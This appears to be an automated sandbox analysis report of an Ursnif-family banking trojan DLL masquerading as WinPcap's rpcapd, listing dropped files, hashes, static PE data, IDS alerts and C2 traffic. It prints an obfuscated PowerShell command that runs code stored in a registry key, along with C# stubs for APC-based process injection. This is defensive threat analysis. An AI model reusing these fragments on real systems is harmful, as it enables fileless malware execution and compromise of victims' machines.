                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.b.o.h.4.m.l.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.b.o.h.4.m.l.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.0.cs

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text
                                Category:dropped
                                Size (bytes):417
                                Entropy (8bit):5.038440975503667
                                Encrypted:false
                                SSDEEP:6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny
                                MD5:AE91D1351B9FB773FEF9B6F31D0A22EE
                                SHA1:323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31
                                SHA-256:2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD
                                SHA-512:94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23
                                Malicious:false
                                Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class omrgvusmwh. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ooyvxktqmjp,uint oshbdrwt);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr payqgxim,uint tthajtdrqfh,uint vcyatdpvykk,uint vnrytmsowy);.. }..}.

                                C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdline

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                Category:dropped
                                Size (bytes):377
                                Entropy (8bit):5.245551465598388
                                Encrypted:false
                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fQ+b0zxs7+AEszIcNwi23fQ+CWH:p37Lvkmb6KwZ4+wWZEJZ4+VH
                                MD5:657DF5DBF2CD40C8427224A737044E8C
                                SHA1:9BB8F1884A4BF325B5E07D3874D7CB7CD163A047
                                SHA-256:47A5E44ED29C7B102C323480B9BFB1992012E17C84BD7C5A601E3AADC9690BCA
                                SHA-512:60404977E8335B653914ADE5B6B9506714E2855F31A4F9E046898D7A66480CAC4631D851061911B309E6AFBF0EBFA8539D1417E00861D8F25C21AF6AF6E4FDFF
                                Malicious:false
                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.0.cs"

                                C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.dll

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3584
                                Entropy (8bit):2.643829505456859
                                Encrypted:false
                                SSDEEP:24:etGSDeMWWOJy853Ek0s2E7Og1odWQzbtkZfdFwT/OWI+ycuZhNUsvakSfsIPNnq:6svz5UkGE7vsWQzqJ/a11ul/a3jq
                                MD5:010A7FEF0AA253BE01A7D57105104C99
                                SHA1:EC3146FF9E8A4218C2D14CE70863692B953A751E
                                SHA-256:B291831CDE532E047D0BBDB58CEFA9AAF938BEFE3F2FDF3762F7F7387A134DD5
                                SHA-512:C5B8B280D4D696424FBB02582992513EFA5186E4DCBABB2E2057439178330A8857A0DF3172F054FC8CB94966182FAFA6F813A979871E3A8E44FB21350D4268D5
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+cb...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H.......X ..p.............................................................(....*BSJB............v4.0.30319......l...H...#~......P...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............1.......................".............. =............ O............ W.....P ......d.........j.....v...........................d. ...d...!.d.%...d.......*.....3.D.....=.......O.......W...........

                                C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.out

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                Category:modified
                                Size (bytes):874
                                Entropy (8bit):5.323639412262709
                                Encrypted:false
                                SSDEEP:24:AId3ka6KgvEvbOKaM5DqBVKVrdFAMBJTH:Akka67vEvCKxDcVKdBJj
                                MD5:77A926519D8FA89DF6F5D0C77E79D0A3
                                SHA1:7912DA6B9435D7AF26FA649341CB5E0124EA8FC3
                                SHA-256:452BD2C2631FDB744B80E6DD5A033C45548FE8733869C2F9F41110A529F1F9B0
                                SHA-512:40D9D3C5443AD37475C6F9A3B5E1E4C784B44AA664DE62EA10A0B6011657DFF2A2AA5B9846B58B1A75277E747406A42BB7DDCD99A67ECB23FDB82D1CBB225BBA
                                Malicious:false
                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                C:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:MSVC .res
                                Category:dropped
                                Size (bytes):652
                                Entropy (8bit):3.1048977846809547
                                Encrypted:false
                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryMbak7Ynqq/UPN5Dlq5J:+RI+ycuZhNwakScPNnqX
                                MD5:E2051F8A521B2F3B00C715BD57DCCC78
                                SHA1:667FC3B5ED67494166B61D57050519DA3C24C9EC
                                SHA-256:9FC45C88A9D75B6A1856480057CACF18B668C8C61992A417C1FB48EB0C4381F1
                                SHA-512:9C0585D9186601C0497179607893F845DABBFFFB8BE8453162BD9435CB1F6F9030CE01F1A16ADE1E79FBC01DF4B16CD3913EB4A39DA0F391CC0B06D92A8A1F89
                                Malicious:false
                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.k.b.u.g.t.x.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.k.b.u.g.t.x.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.0.cs

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text
                                Category:dropped
                                Size (bytes):411
                                Entropy (8bit):5.082169696837192
                                Encrypted:false
                                SSDEEP:6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy
                                MD5:248E15CD19191D4333303E0E1F8E9A70
                                SHA1:9896EF9708F81AE4E3F2CA86329AD6BD82C700C3
                                SHA-256:0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF
                                SHA-512:8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1
                                Malicious:false
                                Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yifpgxqqbj. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr fsk,IntPtr kjxclvenfq,IntPtr wvolbwmjwax);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint jbsq,uint eftlv,IntPtr hpbmctchgk);.. }..}.

                                C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                Category:dropped
                                Size (bytes):377
                                Entropy (8bit):5.2338402577992165
                                Encrypted:false
                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2cNwi23fDSZ++zxs7+AEszIcNwi23fDSZE:p37Lvkmb6KwZLYWZEJZLV
                                MD5:23922C7400B5639004534C21A8FC6FD9
                                SHA1:EFC910B97F452FB59BF063CB331136BF7B5EE364
                                SHA-256:65423661DBE57376B2BFEE4E014394645B6A2C67FC8C71C9F9196D586FBBAE09
                                SHA-512:557EF63D5E3B0D3228229F28E76BADE02AC8844BAE6AA0D67C987A459C1D9B7430283C6AAFD98B56701993112344740A7BF128ECD2FD9E061A0C54C968650AA1
                                Malicious:false
                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.0.cs"

                                C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.dll

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):3584
                                Entropy (8bit):2.6392294884325143
                                Encrypted:false
                                SSDEEP:24:etGSc8+mUE7R853RY0kCG++4I4tkZfcuDZ0WI+ycuZhNwakScPNnq:6GXE7S50/JcYZX1ulwa3Mq
                                MD5:DF0CED5409923E601543A19300A5F2C0
                                SHA1:B5055B13C52F28A7AC23A4DC6F1BC7058B50EA16
                                SHA-256:95927D387C19566BAF533827449CDAF0EB132DF3DFF1F500ECCDDB1DAEC9313D
                                SHA-512:4F64BBE5A0E84FF07B70A07DCF97C58BC444B42800C4479E33F8424E6A8C3DA137AEA4E3F62D1991CD86B452840BEFDBC49013949082295D131875AEC65A0455
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+cb...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....r.....}.....................h. ...h...!.h.%...h.......*.....3.8.....=.......J.......]...........

                                C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.out

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                Category:modified
                                Size (bytes):874
                                Entropy (8bit):5.318135012806756
                                Encrypted:false
                                SSDEEP:24:AId3ka6KgLpEvLwKaM5DqBVKVrdFAMBJTH:Akka67FEvEKxDcVKdBJj
                                MD5:1057CD175F0A0ED38ECEADB83BD825CC
                                SHA1:1510C0179E5FC3A55FB866668781A6CF04B43611
                                SHA-256:2CC8FD12A44EEFECF8ED908C4EE2C450036626C87C13A238A7F560E1891A528C
                                SHA-512:748F36E9A2484DC0413481447CB1325365F7DCE121E208AB2ED48ADF4282D18975FD66700E421AC6CEA98CD2A424AA71A3AADC956330DE4EC648356684B03435
                                Malicious:false
                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                C:\Users\user\Documents\20220422\PowerShell_transcript.910646.1Eiln6hD.20220422152728.txt

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1371
                                Entropy (8bit):5.404148001284477
                                Encrypted:false
                                SSDEEP:24:BxSAGdZOvBdaQx2DOXUWZJ/t+LCHt4qW4HjeTKKjX4CIym1ZJX0J/t+LCHt4gnxf:BZ9v6QoOFht4t4qDYB1Zaht4eZZcC
                                MD5:0B43799452C644E51F9DD4EF713574B6
                                SHA1:70329EFE7607D70C080CE16FE4CB78592B878CED
                                SHA-256:134FFA52B0570D604C1799C9CBB7AD9F2CD2B4154DD6166D79176D53A8C4BD58
                                SHA-512:1829C6541D3DAD2E8BF85716238A6B4251AAC6166E1FE122B0E43643FAF772B03DE20C3B244F50EA102E2CBBF4C67B004E82C4F0421705521A499885FCF18E5D
                                Malicious:false
                                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220422152730..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6932..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220422152730..**********************..PS>new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex;

                                Static File Info

                                General

                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.10709348833746
                                TrID:
                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                • Generic Win/DOS Executable (2004/3) 0.20%
                                • DOS Executable Generic (2002/1) 0.20%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:HxEWwh74qT.dll
                                File size:639303
                                MD5:5d2b5cbd8a574c9e35309e21ecf93a0e
                                SHA1:c15e583e28556f5d187197937b4d2a715ebf8ca7
                                SHA256:52d14c9cd56aa41ba98a24a4a3dc3674f7e281c3d79f6aca141382fb56585bcd
                                SHA512:e040b612277556aa5c4b669672f1ff4704bacab562a268c67bf80bdc4a861cdbc74f3a226b0a1d37f61db047228f8ee0b1acbe81accd19d38de28dbb0df94ddd
                                SSDEEP:12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZR:+w1lEKOpuYxiwkkgjAN8ZR
                                TLSH:3DD4BD1A029B2102EBB6CE78A751636C54174CE09B01E2CFC9190DA395E35FBF4FA5ED
                                File Content Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{.......................

                                File Icon

                                Icon Hash:74f0e4ecccdce0e4

                                Static PE Info

                                General

                                Entrypoint:0x401023
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:fd1c62e6f93e304a27347077f6d2b44c

                                Authenticode Signature

                                Signature Valid:
                                Signature Issuer:
                                Signature Validation Error:
                                Error Number:
                                Not Before, Not After
                                  Subject Chain
                                    Version:
                                    Thumbprint MD5:
                                    Thumbprint SHA-1:
                                    Thumbprint SHA-256:
                                    Serial:

                                    Entrypoint Preview

                                    Instruction
                                    jmp 00007F5AD49CE36Dh
                                    jmp 00007F5AD49FEAD8h
                                    jmp 00007F5AD49CE053h
                                    jmp 00007F5AD49CDD0Eh
                                    jmp 00007F5AD49CE129h
                                    jmp 00007F5AD49CDB64h
                                    jmp 00007F5AD4A03F4Fh
                                    jmp 00007F5AD49CDC6Ah
                                    jmp 00007F5AD49F72C5h
                                    jmp 00007F5AD4A07180h
                                    jmp 00007F5AD4A02DEBh
                                    jmp 00007F5AD4A08346h
                                    jmp 00007F5AD49CDBE1h
                                    jmp 00007F5AD49F83FCh
                                    jmp 00007F5AD4A0AA17h
                                    jmp 00007F5AD4A01CC2h
                                    jmp 00007F5AD49F947Dh
                                    jmp 00007F5AD49CE098h
                                    jmp 00007F5AD4A0D9B3h
                                    jmp 00007F5AD49CDDBEh
                                    jmp 00007F5AD4A09579h
                                    jmp 00007F5AD49FFBA4h
                                    jmp 00007F5AD49FA48Fh
                                    jmp 00007F5AD4A0939Ah
                                    jmp 00007F5AD49CE035h
                                    jmp 00007F5AD4A04F70h
                                    jmp 00007F5AD49FC9CBh
                                    jmp 00007F5AD4A0CAD6h
                                    jmp 00007F5AD49FB891h
                                    jmp 00007F5AD49CE02Ch
                                    jmp 00007F5AD49CDBA7h
                                    jmp 00007F5AD4A060B2h
                                    jmp 00007F5AD4A0BA2Dh
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2013 build 21005
                                    • [RES] VS2015 build 23026
                                    • [LNK] VS2013 UPD4 build 31101
                                    • [C++] VS2010 SP1 build 40219
                                    • [IMP] VS2012 UPD2 build 60315
                                    • [RES] VS2008 build 21022
                                    • [EXP] VS2015 UPD3.1 build 24215
                                    • [ C ] VS2012 UPD1 build 51106
                                    • [C++] VS2015 UPD3.1 build 24215

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x970000xc8.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x980000x703.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x10000x1.text
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x990000x46b8.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x410010x38.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x9731c0x254.idata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x3f1700x40000False0.371898651123data4.44682748237IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rdata0x410000x4001b0x41000False0.805322265625data7.15716511851IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x820000x149570x12000False0.179578993056data5.40188601701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .idata0x970000xadd0x1000False0.217041015625data2.64887682924IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .rsrc0x980000x7030x1000False0.1220703125data1.10395588442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x990000x53a50x6000False0.152099609375data5.13419580461IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_VERSION0x981700x3d0data

                                    Imports

                                    DLLImport
                                    WINSPOOL.DRVGetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification
                                    msvcrt.dlltoupper
                                    USER32.dllDestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW
                                    OLEAUT32.dllLHashValOfNameSysA
                                    SHELL32.dllFindExecutableW
                                    KERNEL32.dlllstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA
                                    Secur32.dllInitializeSecurityContextW
                                    ADVAPI32.dllGetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner
                                    GDI32.dllGetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW

                                    Version Infos

                                    DescriptionData
                                    LegalCopyrightCopyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino.
                                    InternalNamerpcapd
                                    FileVersion4.0.0.1040
                                    CompanyNameCACE Technologies
                                    LegalTrademarks
                                    ProductNameWinPcap
                                    ProductVersion4.0.0.1040
                                    FileDescriptionRemote Packet Capture Daemon
                                    Build Description
                                    OriginalFilenamerpcapd.exe
                                    Translation0x0000 0x04b0

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    04/22/22-15:27:17.806871 04/22/22-15:27:17.806871TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977580192.168.2.7146.70.35.138
                                    04/22/22-15:27:18.629540 04/22/22-15:27:18.629540TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977580192.168.2.7146.70.35.138
                                    04/22/22-15:26:57.401743 04/22/22-15:26:57.401743TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977180192.168.2.713.107.43.16
                                    04/22/22-15:27:19.716505 04/22/22-15:27:19.716505TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977580192.168.2.7146.70.35.138

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Apr 22, 2022 15:27:17.782037020 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:17.806235075 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:17.806369066 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:17.806870937 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:17.831151962 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.182925940 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.182971954 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.182987928 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.183068037 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.183109045 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.183115005 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.183139086 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.183161020 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.183202028 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.183307886 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.183341026 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.183377028 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.183378935 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.183398962 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.183419943 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.183427095 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.183465958 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.183490992 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.183500051 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.183516979 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.183559895 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.183581114 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.183641911 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.207326889 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.207511902 CEST4977580192.168.2.7146.70.35.138
                                    Apr 22, 2022 15:27:18.223510981 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.223576069 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.223592997 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.223618031 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.223647118 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.223661900 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.223697901 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.223737001 CEST8049775146.70.35.138192.168.2.7
                                    Apr 22, 2022 15:27:18.223757029 CEST4977580192.168.2.7146.70.35.138
